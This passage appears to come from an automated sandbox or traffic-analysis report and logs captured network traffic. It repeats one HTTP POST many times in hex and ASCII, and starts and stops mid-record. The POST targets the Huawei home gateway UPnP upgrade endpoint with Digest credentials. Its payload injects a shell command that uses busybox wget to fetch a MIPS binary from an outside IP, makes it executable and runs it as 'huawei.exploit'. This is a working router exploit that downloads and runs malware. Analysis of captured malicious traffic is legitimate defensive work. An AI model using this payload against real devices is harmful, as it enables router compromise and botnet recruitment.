94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 